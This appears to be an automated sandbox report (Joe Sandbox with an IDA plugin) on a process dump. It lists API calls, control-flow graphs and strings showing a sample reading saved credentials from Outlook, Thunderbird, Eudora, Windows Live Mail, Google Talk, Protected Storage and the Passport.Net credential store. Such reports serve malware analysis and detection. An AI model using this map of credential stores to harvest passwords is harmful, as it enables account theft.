                                • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                • API String ID: 1846531875-4223776976
                                • Opcode ID: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                • Opcode Fuzzy Hash: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                  • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                  • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                  • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                                • DeleteObject.GDI32(?), ref: 0040D1A6
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                • API String ID: 745651260-375988210
                                • Opcode ID: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                • Opcode Fuzzy Hash: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                • _mbscpy.MSVCRT ref: 00403E54
                                Strings
                                • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                • PStoreCreateInstance, xrefs: 00403C44
                                • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                • pstorec.dll, xrefs: 00403C30
                                • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Library$AddressFreeLoadProc_mbscpy
                                • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                • API String ID: 1197458902-317895162
                                • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 231 40fb00-40fb35 call 44b090 RegOpenKeyExA 234 40fc37-40fc3d 231->234 235 40fb3b-40fb4f RegOpenKeyExA 231->235 236 40fb55-40fb7e RegQueryValueExA 235->236 237 40fc2d-40fc31 RegCloseKey 235->237 238 40fc23-40fc27 RegCloseKey 236->238 239 40fb84-40fb93 call 404734 236->239 237->234 238->237 239->238 242 40fb99-40fbd1 call 4047a5 239->242 242->238 245 40fbd3-40fbdb 242->245 246 40fc19-40fc1d LocalFree 245->246 247 40fbdd-40fc14 memcpy * 2 call 40f802 245->247 246->238 247->246
                                APIs
                                • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                • memcpy.MSVCRT ref: 0040FBE4
                                • memcpy.MSVCRT ref: 0040FBF9
                                  • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                  • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                  • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                  • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                • API String ID: 2768085393-2409096184
                                • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 249 444c4a-444c66 call 444e38 GetModuleHandleA 252 444c87-444c8a 249->252 253 444c68-444c73 249->253 255 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 252->255 253->252 254 444c75-444c7e 253->254 257 444c80-444c85 254->257 258 444c9f-444ca3 254->258 263 444d02-444d0d __setusermatherr 255->263 264 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 255->264 257->252 260 444c8c-444c93 257->260 258->252 261 444ca5-444ca7 258->261 260->252 265 444c95-444c9d 260->265 262 444cad-444cb0 261->262 262->255 263->264 268 444da4-444da7 264->268 269 444d6a-444d72 264->269 265->262 270 444d81-444d85 268->270 271 444da9-444dad 268->271 272 444d74-444d76 269->272 273 444d78-444d7b 269->273 275 444d87-444d89 270->275 276 444d8b-444d9c GetStartupInfoA 270->276 271->268 272->269 272->273 273->270 274 444d7d-444d7e 273->274 274->270 275->274 275->276 277 444d9e-444da2 276->277 278 444daf-444db1 276->278 279 444db2-444dc6 GetModuleHandleA call 40cf44 277->279 278->279 282 444dcf-444e0f _cexit call 444e71 279->282 283 444dc8-444dc9 exit 279->283 283->282
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                • String ID:
                                • API String ID: 3662548030-0
                                • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                                Control-flow Graph

                                APIs
                                • memset.MSVCRT ref: 0044430B
                                  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                  • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                  • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                  • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                  • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                                • memset.MSVCRT ref: 00444379
                                • memset.MSVCRT ref: 00444394
                                  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                • strlen.MSVCRT ref: 004443DB
                                • _strcmpi.MSVCRT ref: 00444401
                                Strings
                                • Store Root, xrefs: 004443A5
                                • \Microsoft\Windows Live Mail, xrefs: 00444350
                                • \Microsoft\Windows Mail, xrefs: 00444329
                                • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                • API String ID: 832325562-2578778931
                                • Opcode ID: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                • Opcode Fuzzy Hash: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 308 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 313 40f5c3-40f5ea RegQueryValueExA 308->313 314 40f6d9-40f6df 308->314 315 40f6d0-40f6d3 RegCloseKey 313->315 316 40f5f0-40f5f4 313->316 315->314 316->315 317 40f5fa-40f604 316->317 318 40f606-40f618 call 40466b call 404734 317->318 319 40f677 317->319 329 40f66a-40f675 call 404785 318->329 330 40f61a-40f63e call 4047a5 318->330 321 40f67a-40f67d 319->321 321->315 322 40f67f-40f6bf call 4012ee RegQueryValueExA 321->322 322->315 328 40f6c1-40f6cf 322->328 328->315 329->321 330->329 335 40f640-40f643 330->335 336 40f661-40f664 LocalFree 335->336 337 40f645-40f65a memcpy 335->337 336->329 337->336
                                APIs
                                • memset.MSVCRT ref: 0040F567
                                • memset.MSVCRT ref: 0040F57F
                                  • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                • memcpy.MSVCRT ref: 0040F652
                                • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                • String ID:
                                • API String ID: 2012582556-3916222277
                                • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 338 4037ca-40381c memset * 2 call 444551 341 4038e2-4038e5 338->341 342 403822-403882 call 4021b6 call 406f06 * 2 strchr 338->342 349 403884-403895 _mbscpy 342->349 350 403897-4038a2 strlen 342->350 351 4038bf-4038dd _mbscpy call 4023e5 349->351 350->351 352 4038a4-4038bc sprintf 350->352 351->341 352->351
                                APIs
                                • memset.MSVCRT ref: 004037EB
                                • memset.MSVCRT ref: 004037FF
                                  • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                  • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                  • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                • strchr.MSVCRT ref: 0040386E
                                • _mbscpy.MSVCRT ref: 0040388B
                                • strlen.MSVCRT ref: 00403897
                                • sprintf.MSVCRT ref: 004038B7
                                • _mbscpy.MSVCRT ref: 004038CD
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                • String ID: %s@yahoo.com
                                • API String ID: 317221925-3288273942
                                • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 354 404a99-404ac2 LoadLibraryA 355 404ac4-404ad2 GetProcAddress 354->355 356 404aec-404af4 354->356 357 404ad4-404ad8 355->357 358 404add-404ae6 FreeLibrary 355->358 362 404af5-404afa 356->362 361 404adb 357->361 358->356 359 404ae8-404aea 358->359 359->362 361->358 363 404b13-404b17 362->363 364 404afc-404b12 MessageBoxA 362->364
                                APIs
                                • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Library$AddressFreeLoadMessageProc
                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                • API String ID: 2780580303-317687271
                                • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 365 4034e4-403544 memset * 2 call 410b1e 368 403580-403582 365->368 369 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 365->369 369->368
                                APIs
                                • memset.MSVCRT ref: 00403504
                                • memset.MSVCRT ref: 0040351A
                                  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                • _mbscpy.MSVCRT ref: 00403555
                                  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                • _mbscat.MSVCRT ref: 0040356D
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _mbscatmemset$Close_mbscpystrlen
                                • String ID: InstallPath$Software\Group Mail$fb.dat
                                • API String ID: 3071782539-966475738
                                • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 374 40f6e2-40f70a call 40466b call 4045db 379 40f710-40f717 call 404734 374->379 380 40f7e9-40f801 call 404656 call 404785 374->380 379->380 385 40f71d-40f72e CredReadA 379->385 385->380 387 40f734-40f73a 385->387 389 40f740-40f743 387->389 390 40f7e5 387->390 389->390 391 40f749-40f759 389->391 390->380 392 40f75a-40f770 391->392 392->392 393 40f772-40f795 call 4047a5 392->393 396 40f7e2 393->396 397 40f797-40f7b6 WideCharToMultiByte 393->397 396->390 398 40f7b8-40f7c6 strlen 397->398 399 40f7d9-40f7dc LocalFree 397->399 398->399 400 40f7c8-40f7d8 _mbscpy 398->400 399->396 400->399
                                APIs
                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                • CredReadA.ADVAPI32(Passport.Net\*,00000004,00000000,?,?,00000000), ref: 0040F729
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                • strlen.MSVCRT ref: 0040F7BE
                                • _mbscpy.MSVCRT ref: 0040F7CF
                                • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharCredFreeLocalMultiReadWidestrlen
                                • String ID: Passport.Net\*
                                • API String ID: 4000595657-3671122194
                                • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 401 40ccd7-40cd06 ??2@YAPAXI@Z 402 40cd08-40cd0d 401->402 403 40cd0f 401->403 404 40cd11-40cd24 ??2@YAPAXI@Z 402->404 403->404 405 40cd26-40cd2d call 404025 404->405 406 40cd2f 404->406 408 40cd31-40cd57 405->408 406->408 410 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 408->410 411 40cd59-40cd60 DeleteObject 408->411 411->410
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                • String ID:
                                • API String ID: 2054149589-0
                                • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                  • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                  • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                • memset.MSVCRT ref: 00408620
                                  • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                • memset.MSVCRT ref: 00408671
                                • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                Strings
                                • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                • String ID: Software\Google\Google Talk\Accounts
                                • API String ID: 1366857005-1079885057
                                • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 441 40ba28-40ba3a 442 40ba87-40ba9b call 406c62 441->442 443 40ba3c-40ba52 call 407e20 _mbsicmp 441->443 465 40ba9d call 4107f1 442->465 466 40ba9d call 404734 442->466 467 40ba9d call 404785 442->467 468 40ba9d call 403c16 442->468 469 40ba9d call 410a9c 442->469 448 40ba54-40ba6d call 407e20 443->448 449 40ba7b-40ba85 443->449 454 40ba74 448->454 455 40ba6f-40ba72 448->455 449->442 449->443 450 40baa0-40bab3 call 407e30 458 40bab5-40bac1 450->458 459 40bafa-40bb09 SetCursor 450->459 457 40ba75-40ba76 call 40b5e5 454->457 455->457 457->449 461 40bac3-40bace 458->461 462 40bad8-40baf7 qsort 458->462 461->462 462->459 465->450 466->450 467->450 468->450 469->450
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Cursor_mbsicmpqsort
                                • String ID: /nosort$/sort
                                • API String ID: 882979914-1578091866
                                • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                APIs
                                  • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                  • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                • memset.MSVCRT ref: 00410E10
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                • _mbscpy.MSVCRT ref: 00410E87
